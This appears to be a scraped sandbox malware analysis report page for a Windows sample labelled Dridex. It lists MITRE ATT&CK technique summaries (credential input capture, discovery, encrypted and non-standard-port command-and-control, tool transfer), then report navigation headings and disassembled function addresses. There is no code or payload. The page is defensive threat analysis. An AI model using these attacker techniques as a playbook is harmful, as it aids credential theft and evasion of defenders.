Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.18296.11433

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTPS Proxied Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Function 6E7851A7, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 235
sleepCOMMON

Function 6E793930, Relevance: 6.8, APIs: 4, Instructions: 834
COMMON

Function 6E796C50, Relevance: 2.1, APIs: 1, Instructions: 584
libraryloaderCOMMON

Function 6E7B39F9, Relevance: 1.7, APIs: 1, Instructions: 157
filenetworkCOMMON

Function 6E7922A0, Relevance: 1.6, APIs: 1, Instructions: 69
nativeCOMMON

Function 6E797A60, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 6E7947B0, Relevance: 3.6, APIs: 2, Instructions: 618
COMMON

Function 6E78543B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91
libraryCOMMON

Function 6E7854F5, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
libraryCOMMON

Function 6E791030, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
memoryCOMMON

Function 6E7B3370, Relevance: 3.4, APIs: 2, Instructions: 366
networkCOMMON

Function 6E7ACAE0, Relevance: 3.2, APIs: 2, Instructions: 207
registryCOMMON

Function 6E7AC790, Relevance: 3.1, APIs: 2, Instructions: 85
registryCOMMON

Function 6E7AC2D0, Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Function 6E79430F, Relevance: 1.7, APIs: 1, Instructions: 162
COMMON

Function 6E7B3820, Relevance: 1.7, APIs: 1, Instructions: 151
networkCOMMON

Function 6E7AC580, Relevance: 1.6, APIs: 1, Instructions: 98
registryCOMMON

Function 6E7AC405, Relevance: 1.6, APIs: 1, Instructions: 83
registryCOMMON

Function 6E7A7660, Relevance: 4.5, Strings: 3, Instructions: 793
COMMONCrypto

Function 6E781570, Relevance: 3.6, Strings: 2, Instructions: 1143
COMMONCrypto

Function 6E78ACD0, Relevance: 2.9, Strings: 1, Instructions: 1641
COMMONCrypto

Function 6E7A3EC0, Relevance: 2.4, Strings: 1, Instructions: 1131
COMMONCrypto

Function 6E7A62F0, Relevance: 2.2, Strings: 1, Instructions: 961
COMMONCrypto

Function 6E79C590, Relevance: 2.1, Strings: 1, Instructions: 878
COMMONCrypto

Function 6E7A2E60, Relevance: 2.0, Strings: 1, Instructions: 797
COMMONCrypto

Function 6E79D030, Relevance: 2.0, Strings: 1, Instructions: 789
COMMONCrypto

Function 6E7A89F0, Relevance: 2.0, Strings: 1, Instructions: 748
COMMONCrypto

Function 6E79AE80, Relevance: 2.0, Strings: 1, Instructions: 719
COMMONCrypto

Function 6E79B6F0, Relevance: 2.0, Strings: 1, Instructions: 704
COMMONCrypto

Function 6E79A660, Relevance: 1.9, Strings: 1, Instructions: 690
COMMONCrypto

Function 6E7A1EB0, Relevance: 1.9, Strings: 1, Instructions: 682
COMMONCrypto

Function 6E7A26B0, Relevance: 1.9, Strings: 1, Instructions: 653
COMMONCrypto

Function 6E7A1730, Relevance: 1.9, Strings: 1, Instructions: 649
COMMONCrypto

Function 6E7A4CA0, Relevance: 1.6, Strings: 1, Instructions: 358
COMMONCrypto

Function 6E786AD0, Relevance: .9, Instructions: 932
COMMONCrypto

Function 6E7A50A0, Relevance: .8, Instructions: 835
COMMONCrypto